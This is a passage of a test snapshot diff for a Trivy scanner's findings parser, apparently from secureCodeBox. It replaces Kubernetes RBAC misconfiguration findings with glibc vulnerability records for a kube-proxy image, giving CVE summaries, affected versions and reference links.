"Check whether role permits update/create of a malicious pod", - "location": "scb://trivy/?Kind=ClusterRole&Name=system:aggregate-to-edit", - "mitigation": "Create a role which does not permit update/create of a malicious pod", - "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv048", + "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010024", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22852", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/system:aggregate-to-edit' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV048", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv048", - ], - }, - "category": "Misconfiguration", - "description": "Check whether role permits update/create of a malicious pod", - "location": "scb://trivy/?Kind=ClusterRole&Name=system:aggregate-to-edit", - "mitigation": "Create a role which does not permit update/create of a malicious pod", - "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv048", + "value": "https://support.f5.com/csp/article/K06046097", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/system:aggregate-to-edit' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV049", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv049", - ], - }, - "category": "Misconfiguration", - "description": "Some workloads leverage configmaps to store sensitive data or configuration parameters that affect runtime behavior that can be modified by an attacker or combined with another issue to potentially lead to compromise.", - "location": "scb://trivy/?Kind=ClusterRole&Name=system:aggregate-to-edit", - "mitigation": "Remove write permission verbs for resource 'configmaps'", - "name": "Do not allow management of configmaps(ClusterRole 'system:aggregate-to-edit' should not have access to resource 'configmaps' for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv049", + "value": "https://ubuntu.com/security/CVE-2019-1010024", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010024", }, ], - "severity": "MEDIUM", + "severity": "LOW", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/system:aggregate-to-edit' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV056", - "installedVersion": undefined, - "packageName": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-1010025", + "installedVersion": "2.28-10", + "packageName": "libc-bin", "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv056", + "https://access.redhat.com/security/cve/CVE-2019-1010025", + "https://nvd.nist.gov/vuln/detail/CVE-2019-1010025", + "https://security-tracker.debian.org/tracker/CVE-2019-1010025", + "https://sourceware.org/bugzilla/show_bug.cgi?id=22853", + "https://support.f5.com/csp/article/K06046097", + "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", + "https://ubuntu.com/security/CVE-2019-1010025", + "https://www.cve.org/CVERecord?id=CVE-2019-1010025", ], }, - "category": "Misconfiguration", - "description": "The ability to control which pods get service traffic directed to them allows for interception attacks. Controlling network policy allows for bypassing lateral movement restrictions.", - "location": "scb://trivy/?Kind=ClusterRole&Name=system:aggregate-to-edit", - "mitigation": "Networking resources are only allowed for verbs 'list', 'watch', 'get'", - "name": "Do not allow management of networking resources(ClusterRole 'system:aggregate-to-edit' should not have access to resources ["services", "endpoints", "endpointslices", "networkpolicies", "ingresses"] for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", + "category": "Vulnerability", + "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may guess the heap addresses of pthread_created thread. The component is: glibc. NOTE: the vendor's position is "ASLR bypass itself is not a vulnerability."", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "glibc: information disclosure of heap addresses of pthread_created thread", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv056", + "value": "https://avd.aquasec.com/nvd/cve-2019-1010025", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://access.redhat.com/security/cve/CVE-2019-1010025", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/system:aggregate-to-edit' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV056", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv056", - ], - }, - "category": "Misconfiguration", - "description": "The ability to control which pods get service traffic directed to them allows for interception attacks. Controlling network policy allows for bypassing lateral movement restrictions.", - "location": "scb://trivy/?Kind=ClusterRole&Name=system:aggregate-to-edit", - "mitigation": "Networking resources are only allowed for verbs 'list', 'watch', 'get'", - "name": "Do not allow management of networking resources(ClusterRole 'system:aggregate-to-edit' should not have access to resources ["services", "endpoints", "endpointslices", "networkpolicies", "ingresses"] for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv056", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010025", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010025", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/system:aggregate-to-edit' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV056", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv056", - ], - }, - "category": "Misconfiguration", - "description": "The ability to control which pods get service traffic directed to them allows for interception attacks. Controlling network policy allows for bypassing lateral movement restrictions.", - "location": "scb://trivy/?Kind=ClusterRole&Name=system:aggregate-to-edit", - "mitigation": "Networking resources are only allowed for verbs 'list', 'watch', 'get'", - "name": "Do not allow management of networking resources(ClusterRole 'system:aggregate-to-edit' should not have access to resources ["services", "endpoints", "endpointslices", "networkpolicies", "ingresses"] for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv056", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22853", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://support.f5.com/csp/article/K06046097", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/system:controller:cronjob-controller' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV048", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv048", - ], - }, - "category": "Misconfiguration", - "description": "Check whether role permits update/create of a malicious pod", - "location": "scb://trivy/?Kind=ClusterRole&Name=system:controller:cronjob-controller", - "mitigation": "Create a role which does not permit update/create of a malicious pod", - "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv048", + "value": "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://ubuntu.com/security/CVE-2019-1010025", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010025", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/system:controller:cronjob-controller' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV048", - "installedVersion": undefined, - "packageName": undefined, + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-19126", + "installedVersion": "2.28-10", + "packageName": "libc-bin", "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv048", + "https://access.redhat.com/security/cve/CVE-2019-19126", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19126", + "https://linux.oracle.com/cve/CVE-2019-19126.html", + "https://linux.oracle.com/errata/ELSA-2020-3861.html", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4FQ5LC6JOYSOYFPRUZ4S45KL6IP3RPPZ/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZFJ5E7NWOL6ROE5QVICHKIOUGCPFJVUH/", + "https://nvd.nist.gov/vuln/detail/CVE-2019-19126", + "https://sourceware.org/bugzilla/show_bug.cgi?id=25204", + "https://sourceware.org/ml/libc-alpha/2019-11/msg00649.html", + "https://ubuntu.com/security/notices/USN-4416-1", + "https://usn.ubuntu.com/4416-1/", + "https://www.cve.org/CVERecord?id=CVE-2019-19126", ], }, - "category": "Misconfiguration", - "description": "Check whether role permits update/create of a malicious pod", - "location": "scb://trivy/?Kind=ClusterRole&Name=system:controller:cronjob-controller", - "mitigation": "Create a role which does not permit update/create of a malicious pod", - "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", + "category": "Vulnerability", + "description": "On the x86-64 architecture, the GNU C Library (aka glibc) before 2.31 fails to ignore the LD_PREFER_MAP_32BIT_EXEC environment variable during program execution after a security transition, allowing local attackers to restrict the possible mapping addresses for loaded libraries and thus bypass ASLR for a setuid program.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "glibc: LD_PREFER_MAP_32BIT_EXEC not ignored in setuid binaries", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv048", + "value": "https://avd.aquasec.com/nvd/cve-2019-19126", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://access.redhat.com/security/cve/CVE-2019-19126", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/system:controller:deployment-controller' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV048", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv048", - ], - }, - "category": "Misconfiguration", - "description": "Check whether role permits update/create of a malicious pod", - "location": "scb://trivy/?Kind=ClusterRole&Name=system:controller:deployment-controller", - "mitigation": "Create a role which does not permit update/create of a malicious pod", - "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv048", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19126", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://linux.oracle.com/cve/CVE-2019-19126.html", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/system:controller:deployment-controller' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV048", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv048", - ], - }, - "category": "Misconfiguration", - "description": "Check whether role permits update/create of a malicious pod", - "location": "scb://trivy/?Kind=ClusterRole&Name=system:controller:deployment-controller", - "mitigation": "Create a role which does not permit update/create of a malicious pod", - "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv048", + "value": "https://linux.oracle.com/errata/ELSA-2020-3861.html", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/system:controller:endpoint-controller' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV056", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv056", - ], - }, - "category": "Misconfiguration", - "description": "The ability to control which pods get service traffic directed to them allows for interception attacks. Controlling network policy allows for bypassing lateral movement restrictions.", - "location": "scb://trivy/?Kind=ClusterRole&Name=system:controller:endpoint-controller", - "mitigation": "Networking resources are only allowed for verbs 'list', 'watch', 'get'", - "name": "Do not allow management of networking resources(ClusterRole 'system:controller:endpoint-controller' should not have access to resources ["services", "endpoints", "endpointslices", "networkpolicies", "ingresses"] for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv056", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4FQ5LC6JOYSOYFPRUZ4S45KL6IP3RPPZ/", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZFJ5E7NWOL6ROE5QVICHKIOUGCPFJVUH/", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/system:controller:endpointslice-controller' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV056", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv056", - ], - }, - "category": "Misconfiguration", - "description": "The ability to control which pods get service traffic directed to them allows for interception attacks. Controlling network policy allows for bypassing lateral movement restrictions.", - "location": "scb://trivy/?Kind=ClusterRole&Name=system:controller:endpointslice-controller", - "mitigation": "Networking resources are only allowed for verbs 'list', 'watch', 'get'", - "name": "Do not allow management of networking resources(ClusterRole 'system:controller:endpointslice-controller' should not have access to resources ["services", "endpoints", "endpointslices", "networkpolicies", "ingresses"] for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv056", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-19126", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=25204", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/system:controller:endpointslicemirroring-controller' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV056", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv056", - ], - }, - "category": "Misconfiguration", - "description": "The ability to control which pods get service traffic directed to them allows for interception attacks. Controlling network policy allows for bypassing lateral movement restrictions.", - "location": "scb://trivy/?Kind=ClusterRole&Name=system:controller:endpointslicemirroring-controller", - "mitigation": "Networking resources are only allowed for verbs 'list', 'watch', 'get'", - "name": "Do not allow management of networking resources(ClusterRole 'system:controller:endpointslicemirroring-controller' should not have access to resources ["services", "endpoints", "endpointslices", "networkpolicies", "ingresses"] for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv056", + "value": "https://sourceware.org/ml/libc-alpha/2019-11/msg00649.html", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://ubuntu.com/security/notices/USN-4416-1", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/system:controller:generic-garbage-collector' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV046", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv046", - ], - }, - "category": "Misconfiguration", - "description": "Check whether role permits specific verb on wildcard resources", - "location": "scb://trivy/?Kind=ClusterRole&Name=system:controller:generic-garbage-collector", - "mitigation": "Create a role which does not permit specific verb on wildcard resources", - "name": "No wildcard resource roles(Role permits specific verb on wildcard resource)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv046", + "value": "https://usn.ubuntu.com/4416-1/", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-19126", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/system:controller:expand-controller' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV041", - "installedVersion": undefined, - "packageName": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-9192", + "installedVersion": "2.28-10", + "packageName": "libc-bin", "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv041", + "https://access.redhat.com/security/cve/CVE-2019-9192", + "https://nvd.nist.gov/vuln/detail/CVE-2019-9192", + "https://sourceware.org/bugzilla/show_bug.cgi?id=24269", + "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", + "https://www.cve.org/CVERecord?id=CVE-2019-9192", ], }, - "category": "Misconfiguration", - "description": "Check whether role permits managing secrets", - "location": "scb://trivy/?Kind=ClusterRole&Name=system:controller:expand-controller", - "mitigation": "Create a role which does not permit to manage secrets if not needed", - "name": "Do not allow management of secrets(Role permits management of secret(s))", + "category": "Vulnerability", + "description": "** DISPUTED ** In the GNU C Library (aka glibc or libc6) through 2.29, check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled Recursion, as demonstrated by '(|)(\\\\1\\\\1)*' in grep, a different issue than CVE-2018-20796. NOTE: the software maintainer disputes that this is a vulnerability because the behavior occurs only with a crafted pattern.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "glibc: uncontrolled recursion in function check_dst_limits_calc_pos_1 in posix/regexec.c", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv041", + "value": "https://avd.aquasec.com/nvd/cve-2019-9192", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://access.redhat.com/security/cve/CVE-2019-9192", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/system:controller:horizontal-pod-autoscaler' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV046", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv046", - ], - }, - "category": "Misconfiguration", - "description": "Check whether role permits specific verb on wildcard resources", - "location": "scb://trivy/?Kind=ClusterRole&Name=system:controller:horizontal-pod-autoscaler", - "mitigation": "Create a role which does not permit specific verb on wildcard resources", - "name": "No wildcard resource roles(Role permits specific verb on wildcard resource)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv046", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-9192", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=24269", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/system:controller:horizontal-pod-autoscaler' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV046", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv046", - ], - }, - "category": "Misconfiguration", - "description": "Check whether role permits specific verb on wildcard resources", - "location": "scb://trivy/?Kind=ClusterRole&Name=system:controller:horizontal-pod-autoscaler", - "mitigation": "Create a role which does not permit specific verb on wildcard resources", - "name": "No wildcard resource roles(Role permits specific verb on wildcard resource)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv046", + "value": "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-9192", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/system:controller:job-controller' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV048", - "installedVersion": undefined, - "packageName": undefined, + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-27645", + "installedVersion": "2.28-10", + "packageName": "libc-bin", "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv048", + "https://access.redhat.com/security/cve/CVE-2021-27645", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27645", + "https://linux.oracle.com/cve/CVE-2021-27645.html", + "https://linux.oracle.com/errata/ELSA-2021-9560.html", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7LZNT6KTMCCWPWXEOGSHD3YLYZKUGMH5/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/I7TS26LIZSOBLGJEZMJX4PXT5BQDE2WS/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-27645", + "https://security.gentoo.org/glsa/202107-07", + "https://sourceware.org/bugzilla/show_bug.cgi?id=27462", + "https://ubuntu.com/security/notices/USN-5310-1", + "https://www.cve.org/CVERecord?id=CVE-2021-27645", ], }, - "category": "Misconfiguration", - "description": "Check whether role permits update/create of a malicious pod", - "location": "scb://trivy/?Kind=ClusterRole&Name=system:controller:job-controller", - "mitigation": "Create a role which does not permit update/create of a malicious pod", - "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", + "category": "Vulnerability", + "description": "The nameserver caching daemon (nscd) in the GNU C Library (aka glibc or libc6) 2.29 through 2.33, when processing a request for netgroup lookup, may crash due to a double-free, potentially resulting in degraded service or Denial of Service on the local system. This is related to netgroupcache.c.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "glibc: Use-after-free in addgetnetgrentX function in netgroupcache.c", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv048", + "value": "https://avd.aquasec.com/nvd/cve-2021-27645", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://access.redhat.com/security/cve/CVE-2021-27645", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/system:controller:namespace-controller' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV046", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv046", - ], - }, - "category": "Misconfiguration", - "description": "Check whether role permits specific verb on wildcard resources", - "location": "scb://trivy/?Kind=ClusterRole&Name=system:controller:namespace-controller", - "mitigation": "Create a role which does not permit specific verb on wildcard resources", - "name": "No wildcard resource roles(Role permits specific verb on wildcard resource)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv046", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27645", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://linux.oracle.com/cve/CVE-2021-27645.html", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/system:controller:persistent-volume-binder' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV041", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv041", - ], - }, - "category": "Misconfiguration", - "description": "Check whether role permits managing secrets", - "location": "scb://trivy/?Kind=ClusterRole&Name=system:controller:persistent-volume-binder", - "mitigation": "Create a role which does not permit to manage secrets if not needed", - "name": "Do not allow management of secrets(Role permits management of secret(s))", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv041", + "value": "https://linux.oracle.com/errata/ELSA-2021-9560.html", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/system:controller:persistent-volume-binder' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV056", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv056", - ], - }, - "category": "Misconfiguration", - "description": "The ability to control which pods get service traffic directed to them allows for interception attacks. Controlling network policy allows for bypassing lateral movement restrictions.", - "location": "scb://trivy/?Kind=ClusterRole&Name=system:controller:persistent-volume-binder", - "mitigation": "Networking resources are only allowed for verbs 'list', 'watch', 'get'", - "name": "Do not allow management of networking resources(ClusterRole 'system:controller:persistent-volume-binder' should not have access to resources ["services", "endpoints", "endpointslices", "networkpolicies", "ingresses"] for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv056", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7LZNT6KTMCCWPWXEOGSHD3YLYZKUGMH5/", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/I7TS26LIZSOBLGJEZMJX4PXT5BQDE2WS/", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/system:controller:persistent-volume-binder' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV056", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv056", - ], - }, - "category": "Misconfiguration", - "description": "The ability to control which pods get service traffic directed to them allows for interception attacks. Controlling network policy allows for bypassing lateral movement restrictions.", - "location": "scb://trivy/?Kind=ClusterRole&Name=system:controller:persistent-volume-binder", - "mitigation": "Networking resources are only allowed for verbs 'list', 'watch', 'get'", - "name": "Do not allow management of networking resources(ClusterRole 'system:controller:persistent-volume-binder' should not have access to resources ["services", "endpoints", "endpointslices", "networkpolicies", "ingresses"] for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv056", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-27645", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://security.gentoo.org/glsa/202107-07", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/system:controller:replicaset-controller' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV048", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv048", - ], - }, - "category": "Misconfiguration", - "description": "Check whether role permits update/create of a malicious pod", - "location": "scb://trivy/?Kind=ClusterRole&Name=system:controller:replicaset-controller", - "mitigation": "Create a role which does not permit update/create of a malicious pod", - "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv048", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=27462", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://ubuntu.com/security/notices/USN-5310-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-27645", }, ], - "severity": 